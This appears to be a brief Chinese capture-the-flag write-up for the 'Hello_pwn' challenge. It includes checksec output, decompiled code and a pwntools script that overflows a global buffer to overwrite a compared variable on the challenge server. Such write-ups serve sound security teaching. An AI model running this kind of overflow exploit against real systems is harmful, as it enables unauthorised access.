攻防世界 Hello_pwn PWN
先查壳,只开了 NX
[*] '\hellopwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
放进 IDA 反编译。
__int64 __fastcall main(int a1, char **a2, char **a3) { alarm(0x3Cu); setbuf(stdout, 0LL); puts("~~ welcome to ctf ~~ "); puts("lets get helloworld for bof"); read(0, &unk_601068, 0x10uLL); if ( dword_60106C == 1853186401 ) sub_400686(); return 0LL; }
大概是读进 601068 ,然后对 60106C 作比较
利用 read 的溢出。
from pwn import * p = remote("61.147.171.105", 64116) payload = b'O'*4 + p64(1853186401) p.sendlineafter('lets get helloworld for bof', payload) p.interactive()